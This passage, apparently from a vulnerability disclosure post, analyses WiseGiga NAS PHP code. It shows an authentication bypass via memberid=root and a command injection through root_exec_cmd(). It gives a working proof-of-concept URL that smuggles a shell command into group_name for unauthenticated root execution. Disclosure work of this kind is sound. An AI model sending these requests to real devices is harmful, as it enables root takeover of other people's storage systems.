class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-o\">&lt;&lt;&lt;<\/span><span class=\"crayon-e\">__DATA_OF_HTML__<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">198<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;JavaScript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">199<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;xc0xcexc1xf5xb9xdexc1xf6 xbexcaxc0xba xbbxe7xbfxebxc0xdaxc0xd4xb4xcfxb4xd9!&#8221;<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/&nbsp;&nbsp;&nbsp;&nbsp;location.href=&#8217;\/admin\/&#8217;;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">201<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;index.php&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;_parent&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">202<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">exit<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">203<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">204<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__DATA_OF_HTML__<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-25\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">205<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">206<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">207<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0034 seconds] -->  <\/p>\n<p>Using global <em>$memberid<\/em> (line 184), the attacker can override the authentication, by specifying a valid user (&#8220;root&#8221;) inside the HTTP request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980585437594646\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/webpage[&#8230;]?memberid=root&amp;[&#8230;] HTTP\/1.0<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980585437594646-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980585437594646-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webpage<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">memberid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.0<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>The pre.php file also contains a function, <em>root_exec_cmd()<\/em>, that writes its argument to a file on the ramdisk and then launches a helper through <em>popen()<\/em>; nothing validates the command string:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980587719805087\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 23 function root_exec_cmd($cmd)  24 {  25         $tmpfile=fopen(&#8220;\/tmp\/ramdisk\/cmd.list&#8221;,&#8221;w&#8221;);  26         fwrite($tmpfile,$cmd);  27         fclose($tmpfile);  28         popen(&#8220;\/tmp\/ramdisk\/ramush&#8221;,&#8221;r&#8221;);  29 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980587719805087-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980587719805087-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980587719805087-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980587719805087-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-1\"><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root_exec_cmd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980587719805087-2\"><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-3\"><span class=\"crayon-cn\">25<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpfile<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">fopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/tmp\/ramdisk\/cmd.list&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980587719805087-4\"><span class=\"crayon-cn\">26<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">fwrite<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpfile<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-5\"><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">fclose<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpfile<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-59af22d980587719805087-6\"><span class=\"crayon-cn\">28<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">popen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/tmp\/ramdisk\/ramush&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;r&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980587719805087-7\"><span class=\"crayon-cn\">29<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>Any page that reaches <em>root_exec_cmd()<\/em> with a user-controlled <em>$cmd<\/em> therefore lets an attacker execute arbitrary commands with a single <em>GET<\/em> request.<\/p>\n<p>The WiseGiga NAS runs the Apache server as root (uid=0 with gid=48 &#8220;apache&#8221;), so those commands execute as root.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>Sending a GET request to <em>\/admin\/group.php<\/em> with the parameter <code>?cmd=add<\/code> makes the WiseGiga NAS call the <em>add_system()<\/em> function:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98058a112146562\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px 
!important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 178 if($cmd == &#8220;add&#8221;)  179 {  180         add_system();  181 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058a112146562-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058a112146562-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058a112146562-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058a112146562-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; 
line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d98058a112146562-1\"><span class=\"crayon-cn\">178<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;add&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058a112146562-2\"><span class=\"crayon-cn\">179<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058a112146562-3\"><span class=\"crayon-cn\">180<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">add_system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058a112146562-4\"><span class=\"crayon-cn\">181<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>The <em>add_system()<\/em> function declares <em>$group_name<\/em> and <em>$user_data<\/em> as globals, so both can be supplied as request parameters. 
<\/p>\n<p>It then interpolates that user-controlled input into a shell command and runs it as root:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98058d596954454\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 145 function add_system()  146 {  147         
global $group_name,$user_data;  148  149     if(add_conf()==1)  150     {  151 \/\/====================================================================================  152         root_exec_cmd(&#8220;addgroup $group_name&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98058d596954454-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98058d596954454-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-1\"><span class=\"crayon-cn\">145<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">add_system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-2\"><span class=\"crayon-cn\">146<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-3\"><span class=\"crayon-cn\">147<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">group_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">user_data<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-4\"><span class=\"crayon-cn\">148<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-5\"><span class=\"crayon-cn\">149<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">add_conf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-6\"><span class=\"crayon-cn\">150<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98058d596954454-7\"><span class=\"crayon-cn\">151<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/====================================================================================<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98058d596954454-8\"><span class=\"crayon-cn\">152<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">root_exec_cmd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;addgroup $group_name&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>An attacker can get unauthenticated RCE as root by sending the following request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980590067862777\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; 
-o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;id%20&gt;%20\/tmp\/a<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980590067862777-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980590067862777-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;id%20&gt;%20\/tmp\/a<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>The file <em>\/tmp\/a<\/em> will contain:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980593801537199\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px 